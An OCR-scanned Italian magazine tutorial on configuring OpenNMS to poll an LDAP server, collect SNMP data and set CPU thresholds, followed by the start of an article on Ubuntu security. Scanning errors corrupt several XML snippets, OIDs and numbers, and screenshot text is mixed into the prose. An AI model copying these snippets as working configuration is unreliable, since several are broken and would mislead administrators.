renti protocolli tra cui l'SNMP. Per il monitoraggio del server LDAP uti- 
lizzeremo il polling, discutendo della collection successivamente quando 
effettueremo il monitoraggio del server GNU/Linux utilizzando il proto- 
collo SNMP. Durante il polling, i dispositivi di rete vengono raggruppati 
in package. Ogni package definisce l'insieme dei servizi che devono esse- 
re interrogati, la frequenza e il calendario del polling. È possibile definire 
differenti package e per ciascuno di essi è possibile definire differenti 
interfacce e servizi. Ad esempio, è possibile creare tre differenti package, 
denominati rispettivamente oro, argento e bronzo che differiscono per la 
frequenza con cui viene eseguito il polling, ad esempio rispettivamente 
ogni minuto, ogni cinque minuti e ogni quindici minuti. Per ogni packa- 
ge. oltre al nome, viene definito un modello di downtime e un calendario 
delle interruzioni. Il modello di downtime specifica come il poller deve 
modificare la sua politica sui servizi down. Un modello di downtime può 
essere di tipo statico o adattivo. Il modello statico, in cui il poller sonda 
il servizio a intervalli regolari, presenta un grosso limite. Supponiamo 
infatti che la frequenza di esecuzione del polling sia di 5 minuti e che 
proprio durante la prima verifica il servizio risulta down, mentre risulta 
essere regolarmente attivo al polling successivo (che avviene cinque mi- 
nuti dopo). In questo caso, per OpenNMS il periodo di down del servizio 
è pari a 5 minuti, anche se il servizio è stato effettivamente irraggiungi- 
bile solo per pochi secondi. In questo modo viene notevolmente il livello 
di servizio offerto (service level agreement). Il modello adattivo, invece, 
serve per evitare questi problemi: una volta che viene rilevata una inter- 
ruzione, il periodo di polling viene incrementato. Ad esempio, dal mo- 
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mento in cui si verifica l'interruzione e fino a cinque minuti successivi, il 
poller sonda il servizio ogni 30 secondi. A partire da 5 minuti e fino a 12 
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ore, il poller sonda il servizio ogni 5 minuti, mentre da 12 ore a 5 giorni 
il poller esegue la verifica ogni 10 minuti. 

Il calendario delle interruzioni, invece, specifica i periodi durante i quali 
eventuali interruzioni del servizio non devono essere riconosciute come 
tali ma come interruzioni previste dovute alla normale manutenzione 
ordinaria. Ad esempio, se una volta al mese si pianifica una attività di 
chiusura del database allo scopo di eseguire un backup fisico dei data- 
file. è possibile specificare l'intervallo temporale durante il quale è pre- 
vista l'interruzione del servizio, in modo che i dati raccolti dal sistema 
di monitoraggio non influenzino i risultati reali. Quando in un package 
è definito un calendario delle interruzioni, il poller non verrà eseguito 
durante tale periodo, Ovviamente questo non significa che il servizio 
sia down. A partire dalla versione 1.5.91 è possibile definire il calenda- 
rio direttamente da interfaccia grafica, tramite il link Scheduled Outage 
sotto la sezione Admin. Per consentire al poller di sondare il servizio 
LDAP, modifichiamo il file di configurazione poller-configuration.xml. 
Se scorriamo velocemente il contenuto di questo file notiamo la pre- 


senza di due package di default, denominati rispettivamente example! 
e strafer per i quali sono stati definiti una serie di servizi e un modello 
di downtime. Per il nostro progetto, creiamo invece un nuovo package, 
denominato pack_lxm definito nel seguente modo: 


<package name="pack lxm"> 
<filter>IPADDR != '0.0.0.0'</filter> 
<include-range begin="192.168.0.0" 1 
end="192.168.254,254" /> 
</package> 


Il codice dovrà essere inserito all'interno del tag poller-configuration 
prima della sezione contenente il tag monitor. Oltre al nome, un packa- 
ge deve definire un filtro che specifica quali interfacce dovranno essere 
incluse nel package. Nel nostro esempio, sono considerate tutte le inter- 
facce differenti dall'indirizzo 0.0.0.0. Viene inoltre definito un range di 
indirizzi che dovranno essere inclusi nel package, che rappresentano gli 
indirizzi dei servizi sui quali il processo dovrà eseguire il polling. In ag- 
giunta, o in alternativa, al tag include-range, è possibile utilizzare il tag 
specific (se si desidera specificare un indirizzo singolo), exclude-range 
(se si vuole specificare il range che deve essere escluso dal package) o, 
infine, include-url che specifica il path assoluto di un file dove vengono 
elencati gli indirizzi IP che dovranno essere inclusi nel package. 

La raccolta delle informazioni sui servizi è sulle interfacce avviene at- 
traverso JRobin, utilizzato a partire dalla versione 1.3.2 come il sistema 
di data collection di default. I dati prodotti da JRobin possono essere 
visionati con qualsiasi applicazione compatibile, quale ad esempio jro- 
bin-inspector, una applicazione java installata automaticamente durante 
il setup di OpenNMS e disponibile sotto la diretory bin del sistema di 
monitoraggio. La politica di memorizzazione delle informazioni adot- 
tata da JRobin viene specificata attraverso il tag RRD (Round Robin 
Database), definito all'interno del package. Il tag RRD presenta una 
struttura simile alla seguente: 


<rrd step="300"> 
<rra>RRA:AVERAGE:0.5:12:1488</rra> 
</rrd> 


L'attributo step del tag RRD definisce la granularità dei dati, ovvero la 
frequenza con cui i dati raccolti da OpenNMS dovranno essere memo- 
rizzati nel database. È uno dei pochi valori espressi in secondi, pertanto 
300 equivale a $ minuti. Ogni RRD è composto da uno o più RRA 
(Round Robin Archive) ciascuno dei quali definisce come i dati rac- 
colti dovranno essere consolidati in un unico valore. Ad esempio, se 
il poller viene eseguito ogni 60 secondi, possiamo definire una regola 
RRA che colleziona i dati raccolti ogni cinque minuti, calcolando la 
media dei cinque valori acquisiti e successivamente memorizzando il 
valore aggregato nell'RRA. Ciascun RRA pertanto viene definito attra- 
verso 5 valori separati dal carattere colon: il primo valore è sempre la 
stringa RRA; il secondo, denominato CF, definisce la funzione di con- 
solidamento dei dati (AVERAGE, MAX, MIN o LAST); il terzo valo- 
re, denominato xff, indica la percentuale di valori che dovranno essere 
sconosciuti per rendere sconosciuto anche il valore aggregato. Ritor- 
nando al precedente esempio, nel caso in cui il dispositivo interrogato 
dal poller non fornisce alcuna risposta (perché ad esempio il servizio 
è stato temporaneamente interrotto), il valore ottenuto sarà identificato 


come UNKNOW (sconosciuto). Un valore del parametro xff pari a 0.5 
indica che il valore aggregato dovrà essere identificato come sconosciu- 
to quando almeno il 50% dei valori raccolti durante il polling saranno 
sconosciuti. Gli ultimi due valori di ciascuna definizione RRA sono de- 
nominati rispettivamente steps e row. Il primo indica il numero di step 
che dovranno essere aggregati assieme e successivamente memorizzati. 
L'ultimo parametro, invece, determina il numero di valori che saranno 
memorizzati nell'RRA. 

Nell'esempio di sopra, assegnando al parametro step il valore 300 e 
al parametro steps il valore 12, i dati saranno aggregati e memorizzati 
ogni 12 steps. Poiché ogni step avviene ogni 300 secondi, i valori saran- 
no memorizzati ogni 12*5=60 minuti. Verranno inoltre mantenute 1488 
informazioni storiche. Poiché ciascuna informazione viene memorizza- 
ta ogni 60 minuti (ovvero un'ora), i dati saranno mantenuti per 62 giorni 
(1#24*62=1488). Ritornando alla configurazione,aggiungiamo le se- 
guenti definizioni, sempre all'interno del package creato in precedenza: 


<rrd step="300"> 
<rra>RRA:AVERAGE:0.5:1:2016</rra> 
<rra>RRA:AVERAGE:0.5:12:1488</rra> 
<rra>RRA:AVERAGE:0.5:288:366</rra> 
<rra>RRA:MAX:0.5:288:366</rra> 
<rra>RRA:MIN:0.5:288:366</rra> 
</rrd> 


La semantica dovrebbe a questo punto essere chiara. Ci limiteremo 
pertanto a descrivere solo l'ultima definizione: ogni 300 secondi viene 
eseguito uno step; 288 step vengono aggregati assieme calcolando il 
valore minimo. Di conseguenza verrà memorizzato un singolo valore 
ogni 24 ore (infatti 288 * 5 = 1440 minuti ovvero 24 ore). Verranno 
mantenuti infine 366 dati storici corrispondenti a 366 giorni. Infine, 
definiamo i servizi che dovranno essere sondati dal poller. Pertanto pri- 
ma della chiusura del tag package aggiungiamo la definizione per il 
servizio LDAP: 


<service name="LDAP" interval="300000"1 
user-defined="false" status="on"> 
<parameter key="port" value="389"/> 
<parameter key="version" value="3"/> 
<parameter key="searchbase" value="ou=users,1 
o=linuxmagazine,c=it"/> 
<parameter key="searchfilter" 1 
value="uid=tux"/> 
<parameter key="dn" value="cn=root"/> 
<parameter key="password" value="L1nuxM4g!"/> 
<parameter key="retry" value="2"/> 
<parameter key="timeout" value="3000"/> 
<parameter key="rrd-repository" value="/opt/} 
opennms/share/rrd/response" /> 
<parameter key="rrd-base-name" value="ldap") 
/> 


</service> 


Il codice definisce un servizio il cui nome (LDAP) deve necessaria- 
mente essere identico a quello definito nel file capsd-configuration.xml. 
Le opzioni name, interval, user-defined e status vengono definite per 
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qualsiasi servizio, mentre i parametri dipendono dal tipo di servizio 
configurato. Nel caso del monitoraggio di un server LDAP è necessario 
specificare la porta di bind, la versione del protocollo LDAP, l'unità 
organizzativa di base utilizzata per la ricerca degli utenti (nel nostro 
caso ou=users,o=linuxmagazine,c=it), il nome dell'utente da ricercare 
all'intero dell'unità organizzativa, il nome e la password con cui Open- 
NMS accede al server LDAP, il numero di tentativi e il timeout. In 
pratica, OpenNMS esegue ogni 300000 millisecondi (ovvero 5 minuti) 
il bind al server LDAP su cui è stato scoperto il servizio utilizzando 
l'utente cn=root con la relativa password. Se il bind va a buon fine. 
esegue la ricerca della entry wid=tux all'interno dell'unità organizzativa 
ou=users,o=linuxmagazine,c=it. In caso di fallimento, l'operazione vie- 
ne eseguita due volte e al massimo attende la risposta per un tempo non 
superiore a tre secondi. Gli ultimi duc parametri, rrd-repository e rrd- 
base-name, specificano rispettivamente il path nel quale dovrà essere 
memorizzato il file jrb e il nome che tale file dovrà avere. Definiamo 
quindi il modello di downtime attraverso la seguente definizione: 


<downtime interval="30000" begin="0" 1 
end="300000" /> 
<downtime interval="300000" begin="300000" 1 
end="43200000" /> 
<downtime interval="600000" begin="43200000" 1 
end="432000000" /> 
<downtime begin="432000000" delete="true" /> 


Il codice, che dovrà essere inserito internamente al package pack_lxm, spe- 
cifica un approccio di tipo adattivo: dal momento in cui viene rilevata l'in- 
terruzione del servizio (istante 0) e fino a 5 minuti (300000 millisecondi), il 
poller sonda il servizio ogni 30 secondi; a partire da $ minuti e fino a 12 ore 
(43200000 millisecondi), il poller sonda il servizio ogni 5 minuti, mentre da 
12 ore a 5 giorni (432000000) il poller esegue la verifica ogni 10 minuti. Se 
l'irraggiungibilità del servizio dovesse continuare oltre i $ giorni, il polling 
viene interrotto. 

L'ultima configurazione consiste nell'aggiunta del monitor per ciascun servi- 
zio. Di default il file di configurazione del poller contiene un elenco esaustivo 
di monitor, tra cui quelli necessario a interrogare il server LDAP. Verifichia- 
mo quindi la presenza della direttiva seguente: 


<monitor service="LDAP" class-name="org.opennms.} 
netmgt.poller.LdapMonitor"/> 


che definisce la classe del monitor per il servizio LDAP. Dopo aver salvato il 
file di configurazione, riavviamo OpenNMS: 


# /opt/opennms/bin/opennms stop 
# /opt/opennms/bin/opennms start 


L'UTILITY JROBIN-INSPECTOR 


L'interfaccia grafica si presenta all'utente si maniera semplice e chia- 
ra (Fig. 1): in alto, una barra del menu, fornisce all'utente l'accesso 
alle funzionalità del sistema; in centro invece una tabella riepilogativa 
mostra gli esiti dei controlli effettuati nelle ultime 24 ore sui diversi 
dispositivi di rete raggruppati per tipologia. Selezionando il link Node 
List viene visualizzata la lista di tutti i nodi monitorati da OpenNMS. 
Selezionando il server LDAP vengono mostrati tutte le interfacce as- 
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Fig. 2 * Percentuali di disponibilità dei servizi 


sociate al nodo ce tutti i servizi in esecuzione sul nodo con lo stato e la 
percentuale di disponibilità del servizio (Fig. 2). Viene inoltre mostrato 
un elenco di tutti i recenti eventi che hanno interessato il nodo. 

Subito dopo l'avvio di OpenNMS, il poller inizierà a sondare il servizio 
LDAP e a raccogliere informazioni sui tempi di risposta dell'opera- 
zione di bind. Questi dati verranno raccolti e memorizzati nei relativi 
archivi in modo da poter essere acceduti da OpenNMS e da qualsiasi 
altro applicativo esterno. OpenNMS visualizza i dati raccolti attraverso 
opportuni grafici, visualizzabili tramite il link Response Time Graph. 
Le specifiche del grafico sono definite nel file di properties denominato 
response-graph, properties. A ffronteremo questo argomento successiva- 
mente. 

È possibile accedere agli archivi contenenti i dati raccolti dal poller 
attraverso l'applicativo jrobin-inspector, installato di default durante 
l'installazione del sistema di monitoraggio: 


# S$OPENNMS_HOME/bin/jrobin-inspector 


Selezioniamo il file ldap.jrb creato in /opt'opennms/share/rrd/response 
in modo da visualizzare i dati raccolti da OpenNMS. 


®Fig. 3 * Grafico dei tempi di risposta dei servizi attivi sul server 
LDAP 


LA SCOPERTA DEL SERVIZIO SNMP 


Fino ad ora abbiamo mostrato come configurare OpenNMS per racco- 


gliere informazioni dai dispositivi di rete attraverso i monitor, ovvero 
processi che periodicamente eseguono il polling della risorsa da moni- 
torare. Il secondo metodo invece consiste nel catturare informazioni at- 
traverso i collectors. Sono stati definiti molteplici collector tra cui quelli 
che collezionano dati attraverso i protocolli SNMP e HTTP. A differen- 
za del poller, il Collector richiede la modifica del file di configurazione 
collectd-configuration.xmI e una serie di file aggiuntivi che dipendono 
dal protocollo utilizzato per la raccolta dei dati. Per il protocollo SNMP 
per esempio è necessaria la modifica dei file snmp-config.xml e data- 
collection-config.xml mentre nel caso del protocollo HTTP dovrà essere 
opportunamente configurato il file http-datacollection-config.xml. 

Qui vedremo come configurare il Collector che, attraverso il procotollo 
SNMP, cattura i dati sulle risorse del server (RAM, CPU, Dischi, Traffico 
di Rete, ecc). A tale scopo è fondamentale attivare il processo snmpd 
sulla macchina sulla quale dovrà essere eseguita la raccolta dei dati. Ana- 
logamente a quanto fatto nel caso del server LDAP, è necessario abilitare 
il processo capsd ad eseguire la ricerca del servizio SNMP sui nodi che 
abbiamo inserito in OpenNMS tramite interfaccia grafica. Apriamo per- 
tanto il file capsd-configuration.xml e aggiungiamo, nel caso in cui fosse 
assente, la seguente definizione: 


<protocol-plugin protocol="SNMP" 
class-name="org.opennms.netmgt.1 
capsd.plugins.SnmpPlugin" 
scan="on"> 
<property key="timeout" value="2000" /> 
<property key="retry" value="1" /> 
</protocol-plugin> 
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la cui semantica dovrebbe già essere nota in quanto molto simile alla definizio- 
ne del protocollo LDAP. Successivamente. abilitiamo il monitor modificando 
il file poller-configuration.xml e aggiungendo la seguente definizione all'in- 
terno del package pack_lxm creato poco fa: 
<service name="SNMP" interval="300000" 1 
user-defined="false" status="on"> 
<parameter key="retry" value="2"/> 
<parameter key="timeout" value="3000"/> 
<parameter key="port" value="161"/> 
<parameter key="oid" value="1.3.6.1.2.1.1.3"1 
/> 
</service> 


Il parametro oid specifica l'Object Identifier che dovrà essere richiesto al 
server attraverso una operazione di GET. L'oid /.3.6./.2./.1.3 si riferisce 
al tempo in cui il server monitorato è rimasto acceso. Il poller pertanto 
considera il server attivo e funzionante quando ottiene una risposta va- 
lida alla richiesta di GET dell'OID specificato. È possibile anche fare 
eseguire al poller alcuni controlli semantici sul valore dell'OID che ha 
ottenuto. Ad esempio, potrebbe essere utile considerare attivo l'host mo- 
nitorato solo quando il numero degli utenti connessi è maggiore o uguale 
a 1. L'OID che fornisce questa informazione è il /.3.6.1.2.7.25.7.5.0. La 
definizione pertanto potrebbe essere la seguente: 


<service name="SNMP" interval="300000" 1 
user-defined="false" status="on"> 
<parameter key="retry" value="2"/> 


No specific interfaces selected 
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<parameter key="timeout" value="3000"/> 
<parameter key="port" value="161"/> 
<parameter key="oid" 1 
value=".1.3.6.1.2.1.25.1.5.0" /> 
<parameter key="operator" value="&gt;="/> 
<parameter key="operand" value="1"/> 
</service> 


dove il valore &gt; corrisponde al simbolo >. Non dimentichiamoci infine di 
aggiungere anche il tag monitor: 


<monitor service="SNMP" 
class-name="org.opennms.netmgt.poller.1 
monitors.SnmpMonitor" /> 


RACCOGLIAMO | DATI! 


Il file di configurazione snmp-config.xml contiene le informazioni ne- 
cessarie a consentire la comunicazione tra OpenNMS e l'agente SNMP 
in esecuzione sul server remoto. Al fine di mantenere semplice la confi- 
gurazione utilizzeremo la versione 2c di SNMP e la community public, 
utilizzati di default da Net-SNMP. Dopo aver aperto il file snmp-config. 
xml inseriamo il seguente codice: 


<snmp-config read-community="public" retry="3" 1 
timeout="1800" version="v2c" /> 


Con questa configurazione, capsd verificherà se sui nodi etichettati 
come “nuovi sospettati” è attivo il servizio SNMP inviando all'interfac- 
cia una richiesta di GET dell'OID specificato dall'omonimo parametro. 
In caso di assenza, OpenNMS tenta di recuperare l'oid sysObjectID 
(1.3.6.1.2.1.1.2.0) che fornisce una descrizione del server. Le informa- 
zioni sulla porta e sulla community utilizzate dal daemon sono quelle in- 
dicate in snmp-config.xml. Se il processo ottiene risposta entro il timeout, 
il servizio è etichettato come attivo. 

Siamo a questo punto pronti per avviare il processo di raccolta dei dati 
attraverso il protocollo SNMP. Il file di configurazione colleetd-configu- 
ration.xml descrive il comportamento del processo delegato alla raccolta 
dei dati. La struttura del file è molto simile a quella del Poller: all'interno 
del tag collectd-configuration sono presenti uno più package nei quali 
vengono definiti uno o più più servizi. Ogni package definisce la frequen- 
za con cui i dati dovranno essere catturati. In maniera analoga a quanto 
fatto per il poller, aggiungiamo un nuovo package denominato pack_lxm 
e definiamo il servizio SNMP: 


<package name="pack lxm"> 
<filter>IPADDR != '0.0.0.0'</filter> 
<include-range begin="192.168.1.1"1 
end="192.168.254.254"/> 
<service name="SNMP" interval="300000" 1 
user-defined="false" status="on"> 
<parameter key="collection" 1 
value="default"/> 
<parameter key="port" value="161"/> 
<parameter key="retry" value="3"/> 
<parameter key="timeout" value="3000"/> 
</service> 
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</package> 


Il parametro collection, non presente nel file di configurazione del poller, 
definisce il nome (in questo caso default) dello schema, presente nel file 
datacollection-config.xml che specifica cosa dovrà essere sondato e cosa 
dovrà essere memorizzato (riprenderemo questo concetto successiva- 
mente). Anche per i collector package è possibile definire un calendario 
delle interruzioni che consente di definire i periodi durante i quali Open- 
NMS non dovrà procedere con la raccolta delle informazioni. Questa 
configurazione può tuttavia essere definita tramite interfaccia grafica, 
selezionando la voce Scheduled Outage nel menu Admin. 

L'ultima configurazione consiste nell'aggiunta del tag collector che defi- 
nisce la classe da usare per la raccolta dei dati: 


<collector service="SNMP" class-name="org.opennms. 1 
netmgt.collectd.SnmpCollector"/> 


THRESHOLDING 


Quando OpenNMS rileva la presenza di un evento importante, contatta 
l'amministratore inviandogli una notifica che descrive il problema. Per 
evento importante si intende il superamento della soglia (threshold) di 
una metrica di performance, come ad esempio i tempi di risposta di 
un servizio oltre un certo limite, la disponibilità di spazio del disco 
sotto una certa soglia, ecc. In generale è possibile definire delle so- 
glie assolute sui valori numerici che OpenNMS raccoglie e memorizza 
nei file RRD, ma è possibile specificare anche soglie relative all'ultimo 
sondaggio, ad esempio è possibile configurare OpenNMS in modo da 
segnalare al manager variazioni di occupazione di disco superiore al 
5% rispetto all'ultimo polling. I file di configurazione che specificano 
il comportamento del demone threshold sono threshold.xml e threshd- 
configuration.xml. Il primo file di configurazione definisce gruppi di 
soglie. Una soglia può essere definita in maniera assoluta o relativa 
(definite dal tag threshold) oppure con una espressione (definita dal 
tag expression). Dopo aver aperto il file di configurazione threshold. 
xml, prima della chiusura del tag thresholding-config, aggiungiamo la 
seguente definizione: 


<group name="thresh _lxm" rrdRepository="/opt/1 
opennms/share/rrd/snmp/"> 
<threshold description="Uso del Processorel 
(User Time)" 
type= "high" 
ds-type="cpuInfo" 
value="20.0" 
rearm="10.0" 
trigger="1" 
ds-label="CpuUserTime" 
triggeredUEI="EUI/CpuUserTime" 
ds-name="CpuUserTime"/> 
</group> 


Nel codice definiamo un gruppo, denominato thresh_lxm, contenente 
un elenco di threshold definiti attraverso i tag threshold oppure expres- 
sion. Per ogni threshold è necessario specificare alcuni attributi, in par- 
ticolare l'attributo type specifica il tipo di soglia. I valori ammessi sono 
high, low e relativeChange. Una soglia di tipo high si attiva quando il 


valore del data source supera il valore specificato dal parametro value e 
si disattiva quando il valore del data source scende al di sotto del valore 
di rearm. Viceversa, una soglia di tipo low si attiva quando il valore del 
data source scende al di sotto del valore specificato dall'attributo value 
e si annulla quando raggiunge il valore specificato dall'attributo rearm. 
Infine, il tipo relativeChange specifica una soglia che si attiva quando 
la variazione del valore acquisito durante un polling è superiore al va- 
lore percentuale specificato dall'attributo value. Nel nostro esempio, 
abbiamo specificato una soglia di tipo high, in modo da sollevare un 
trigger quando il valore della variabile CpuUserTime (specificato dal 
parametro ds-name) supera il valore 20. L'attributo ds-name, che rap- 
presenta il nome della variabile da monitorare, dovrà coincidere con il 
valore dell'attributo alias del tag mibObj definito nel file di configura- 
zione cpustatlxm.xml. L'attributo trigger invece specifica il numero di 
volte (nel nostro caso 1) che tale valore può essere superato prima che 
venga sollevato il trigger. L'attributo triggeredUEI rappresenta l'UEI 
(Unique Event Identifier) che viene spedito all'events system quando la 
soglia viene raggiunta. Questo valore può essere omesso e in tal caso 
viene generato un UEI di default. Limitatamente al tag expression, da 
usare in alternativa al tag threshold, è possibile specificare, oltre agli 
attributi già descritti, anche l'attributo expression che descrive l'espres- 
sione matematica che dovrà essere calcolata prima del confronto con 
il valore soglia. 

Salviamo le modifiche apportate al file e apriamo il secondo file di con- 
figurazione, threshd-configuration.xml. Il file presenta la stessa struttu- 
ra del file di configurazione collectd-configuration su cui abbiamo già 
ampiamente discusso. Aggiungiamo quindi in coda al file la seguente 
definizione: 


<package name="trash pack 1lxm"> 
<filter>IPADDR != '0.0.0.0'</filter> 
<include-range begin="1.1.1.1" 1 
end="254,254,254.254"/> 
<include-range begin="::1" 


Home / Admin / Con! Event Notifications 
Event Notifications 


ig event notifi 


@on CPUInfoNotification 


Qon High Threshold 


Von High Threshold Rearmed 


Jon LowThreshold 


on Low Threshold Rearmed 
interfaceDeleted 


'interfaceDown 


nodsadded OpenNnMS-defined node event: nodeAdded 


nodeDown OpenNMS-defined node event nodeDown 


nodeLostService 


User-defined threshold event EU/CpuUserTime 


OpenNMS-defined threshold event: lowThresholdExceeded 


OpenNnMs-defined threshold event lowThresholdRearmed 


OpenhMs-defined node event interfaceDown 


IopenNMs-defined node event: nodeLostService 


end="ffff : ffff:ffff:ffff:) 
fil: fr: fr: fe" /> 


<service name="SNMP" 
interval="300000" 
user-defined="false" 
status="on"> 

<parameter key="threshol1l 
ding-group" value="thresh lxm"/> 
</service> 
</package> 


Con questo codice definiamo un package, denominato trash_pack_lxm. 
Particolarmente importante è il parametro name del servizio che defini- 
sce il nome del gruppo dei threshold specificato nel file di configurazio- 
ne threshold.xml. Possiamo quindi riavviare il sistema e accedere alla 
piattaforma con le credenziali di amministratore, in modo da visionare, 
tramite Web, la configurazione appena salvata. Selezioniamo quindi il 
link Manage Thresholds sotto la voce di menu Admin. Ci viene mostra- 
to l'elenco dei gruppi dei thresholds. Selezioniamo quindi il link edit in 
corrispondenza della voce thresh_lxm in modo da visionare le opzioni 
di configurazione definite per il threshold. A partire dalla versione 1.6, 
OpenNMS consente l'inserimento di nuovi threshold direttamente tra- 
mite Web ma purtroppo non consente ancora la definizione dei relativi 


gruppi. 


TIRIAMO LE SOMME... 


OpenNMS è un sistema molto complesso e sicuramente difficile da con- 
figurare, ma senza dubbio è un pacchetto completo e la sua elevata adat- 
tabilità gli permette di competere con i più noti programmi commerciali 
in grado di gestire i requisiti di monitoraggio delle grandi imprese. Se 
siete disposti a investire il vostro tempo in OpenNMS, la ricompensa può 
essere grande. 
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® Fig. 5 * L'elenco degli eventi di notifica attivati nel sistema 
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a sicurezza informatica è l’insieme delle misure ne- 
cessarie a garantire disponibilità, integrità e riserva- 
tezza delle informazioni presenti all’interno di una 
rete locale o, più in generale, in un qualsiasi sistema. 
Sostanzialmente, il tema della sicurezza può essere conside- 
rato e sviluppato in due possibili modi, a seconda dello sce- 
nario di riferimento: sistemi di elaborazione dati centralizzati 
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È SICURA 
LA TUA DISTRO? 


La sicurezza è una delle variabili fondamentali da 
tenere in considerazione quando si sceglie di utilizzare 
una qualsiasi distro GNU/Linux: analizziamo il 
comportamento di Ubuntu 


Maurizio Di Paolo Emilio 


e distribuiti. Lo sviluppo dell’informatica, con l'avvento delle 
moderne tecnologie telematiche che utilizzano le architetture 
distribuite, ha incrementato l’utilizzo della rete che ha sostan- 
zialmente modificato il concetto di sicurezza. Il lavoro svol- 
to dai molti dei servizi che usiamo oggi non sarebbe possibile 
senza i computer, le reti e la tecnologia digitale; le compagnie 
aeree, ad esempio, non sarebbero competitive senza sistemi di 
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@ Fig. 1- Ecco uno schema capace di riassumere il concetto di sicurezza informatica 


generatore 
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® Fig. 2 : Come avviene la crittografia 


prenotazione computerizzati e sistemi di supporto di volo e di 
manutenzione completamente (o quasi) automatizzati. Gli aerei 
stessi dipendono fortemente da sensori elettronici e comandi 
digitali, e non sarebbero in grado di funzionare senza il loro 
prezioso supporto. Anche il settore automotive utilizza la tec- 
nologia digitale, basti pensare al Global Positioning System 
(GPS) che permette di sapere dove ti trovi in qualsiasi punto 
della Terra. Con questo dispositivo relativamente poco costoso 
e un computer che contiene una base di mappe, si è in grado di 
tenere traccia di dove si sta andando, trovare punti di riferimen- 
to importanti, ristoranti, intrattenimento, servizi e, infine, per 
raggiungere la destinazione. In tutto ciò, la nozione di sicurezza 
di un sistema operativo, in particolar modo per sistemi Open 
Source è un tema di fondamentale interesse, atto alla preven- 
zione di “attacchi” via rete o fisici (Fig. 1). 


ATTACCO E DIFESA 


La sicurezza fisica e l'integrità e riservatezza dei dati sono 
strettamente collegate fra loro. Tipologie di attacchi comuni 
sono: IP spoofing/shadow server (qualcuno si sostituisce ad 
un host); packet sniffing (lettura delle password di accesso e/o 
dati riservati); connection hijacking/data spoofing (modifica 
di dati durante il loro transito in rete); alterazioni del software, 
virus e trojan; denial-of-service (si impedisce il funzionamen- 
to di un servizio sovraccaricandolo). Quel che fortunatamente è 
certo, è che è possibile attuare dei meccanismi che eliminano, 
o quantomeno limitano, la possibilità che uno di questi attacchi 
venga sferrato. Riassumendo, le armi di difesa in nostro pos- 
sesso sono: 


* Crittografia (Fig. 2): insieme di algoritmi matematici utiliz- 
zati per trasformare il messaggio in una forma indecifrabile. 
Un meccanismo simile si chiama hashing che risulta essere 
più vantaggiosa con notevole risparmio di memoria e tempo. 

* Firma digitale: meccanismo di identificazione indiretta 
dell’utente, 

* Autenticazione: meccanismo di identificazione da terze par- 
ti. 


Una comune forma di crittografia, utilizzata nella cifratura del 
traffico delle applicazioni utilizzando un Secure Socket Layer 


canale sicuro 


(SSL) o la connessione Transport Layer Security (TLS), è 
quella a chiave pubblica. Così facendo, avremo un modo per 
crittografare il traffico utilizzando un protocollo che non for- 
nisce nativamente una cifratura. Un certificato, invece, garan- 
tisce la distribuzione della chiave pubblica e altre informazioni 
su un server. Come più volte abbiamo avuto modo di scoprire 
proprio sulle pagine di Linux Magazine, i certificati di sicu- 
rezza possono essere firmati digitalmente da una Certification 
Authority o CA. Per chi ancora non lo sapesse, una CA è una 
terza parte fidata (generalmente si tratta di enti altamente co- 
nosciuti e certificati), che ha confermato l’esattezza delle infor- 
mazioni contenute nel certificato stesso. 

L'utente principale di un computer ha chiaramente un ruolo im- 
portante da svolgere nel garantire che il PC stesso, così come il 
relativo software in esso installato, siano istituiti con un buon 
grado di sicurezza. Inoltre, gli altri utenti di quella stessa mac- 
china hanno un ruolo molto importante da svolgere: garantire 
che le pratiche di elaborazione siano eseguite con la massima 
attenzione. Ma errare è umano, si sa, e dunque i pericoli sono 
sempre dietro l'angolo. 


UBUNTU E LA SICUREZZA 


In un mondo dove la maggior parte delle vulnerabilità di sicu- 
rezza sono provenienti da applicazioni di terze parti, macchine 
equipaggiate con Microsoft Windows e Mac OS X hanno mag- 
giori probabilità di rischio. Tale problematica, però, il più delle 
volte non è da associarsi a Microsoft e Apple (per quanto alcuni 
possano pensare il contrario). Entrambi i colossi hanno infatti 
sistemi abbastanza completi mirati all'aggiornamento costante 
del software con il chiaro obiettivo di tenere a bada eventuali 
falle di sicurezza. Il vero problema è da ricercarsi invece nei 
software (programmi, estensioni e plug-in) sviluppati da altri 
fornitori proprio per le due piattaforme. Spesso, infatti, una 
software house si limita a meccanismi di aggiornamento dei 
programmi sviluppati esclusivamente votati al miglioramen- 
to delle performance o delle funzionalità presenti, senza dare 
molto conto alla sicurezza informatica. Ma le cose cambiano 
quando si parla di GNU/Linux e, più nel dettaglio, di Ubuntu? 
Fortunatamente sì. Ciò perché c'è un sistema di aggiornamento 
software completo. Proviamo a schiarire ancor di più le idee. 
Quando un utente Windows si ritrova ad aggiornare il proprio 
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sistema, analizzando i dettagli degli aggiornamenti ricevuti, 
scopre che per la quasi totalità si tratta di correzioni a bug re- 
lativi al solo sistema operativo. Quando, al contrario, il gestore 
degli aggiornamenti di Ubuntu segnala la disponibilità di nuovi 
pacchetti, i dettagli cambiano, e di molto. Non si parla esclusi- 
vamente di miglioramenti alla distro di casa Canonical ma di 
tutti i pacchetti che stanno alla base della distro e dei software 
presenti a corredo. Ciò è possibile perché Ubuntu ha un reposi- 
tory centralizzato delle applicazioni (tutte testate da Canonical 
proprio per dimostrare la corretta compatibilità con il sistema 
operativo). Una tale pratica ha sì dei risvolti senza ombra di 
dubbio positivi, ma anche negativi. Un esempio? Nel reposi- 
tory principale di Ubuntu non è sempre presente la versione 
più recente di Mozilla Firefox proprio perché Canonical non 
ha ancora testato il funzionamento privo di intoppi del softwa- 
re. Dunque, ecco perché ogniqualvolta una nuova release di un 
software viene rilasciata occorrono diversi giorni (0 settimane) 
prima di trovarla nei repository ufficiali della distro. Chiusa 
questa parentesi, un altro tool divenuto fondamentale col pas- 
sare degli anni è il firewall, letteralmente un “muro di fuoco” 
che vieta l'accesso da remoto non autorizzato sul PC. L'utilizzo 
di un firewall da parte degli utenti Windows è dovuto sostan- 
zialmente a due motivi: 


* Operazioni di input all'insaputa dell'utente; 

* Operazioni in output poco sicure con intercettazione di virus 
e spyware che possono automaticamente connettersi ed ese- 
guire i lori sporchi compiti. 


In entrambi i casi è necessario proprio un firewall per bloccare 
il traffico in ingresso oppure le connessioni in uscita. Riguardo 
a questi due aspetti, una qualsiasi distribuzione GNU/Linux, 
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presenta vantaggi evidenti in quanto la sua natura Open Source 
rende facilmente individuabile eventuali operazioni anomale o 
non sincrone con i comandi dell’utente. L’immunità ai virus, 
inoltre, rende una distro GNU/Linux sicura verso le connessio- 
ni output. 

Il kernel Linux include il sottosistema Netfilter (Fig. 3), che 
